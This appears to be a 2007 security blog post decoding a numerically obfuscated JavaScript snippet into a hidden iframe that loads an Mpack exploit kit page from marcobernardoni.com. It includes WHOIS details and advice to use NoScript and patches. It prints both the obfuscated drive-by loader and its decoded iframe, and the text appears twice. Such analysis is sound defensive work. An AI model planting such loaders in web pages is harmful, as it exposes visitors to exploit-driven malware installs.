Mpack Decode Requests
I've seen quite a rise of javascript decoding questions on different mailing lists. This evening one from D-Shield was waiting in my email box.
Turns out Dan needed to figure out what this code does:
I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human readable:
The html closing tag is to evade techniques like the one
described by Tom Liston here: http://isc.sans.org/diary.html?storyid=2268
marcobernardoni.com is running on an IP out of Hong Kong and the index page listed has a mpack javascript, which attempts several exploits to push file.php...Of course its a windows PE binary, however it seems to be broken.
Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008
Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161
Protect yourself: Turn off Javascript Completely, or only allow it for certain sites using the Firefox NOSCRIPT plugin, and keep your application patches up to date!
Turns out Dan needed to figure out what this code does:
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='0600730700820650770690321151140990610341041161161120580470471090971140991
11098101114110097114100111';s=s+'11010504609911110904712004710511010010112004
6112104112034032119105100116104061051032104101105103104';s=s+'116061051032115
116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();</script><!-- c4 -->
I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human readable:
(Spaces added to protect from accidental clicks)
</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none"></IFRAME>
The html closing tag is to evade techniques like the one
described by Tom Liston here: http://isc.sans.org/diary.html
marcobernardoni.com is running on an IP out of Hong Kong and the index page listed has a mpack javascript, which attempts several exploits to push file.php...Of course its a windows PE binary, however it seems to be broken.
Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008
Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161
Protect yourself: Turn off Javascript Completely, or only allow it for certain sites using the Firefox NOSCRIPT plugin, and keep your application patches up to date!
Labels: Dshield, Firefox, Iframes, ISC, NOSCRIPT, xored javascript
posted by Nicholas at
04:36
0 Comments
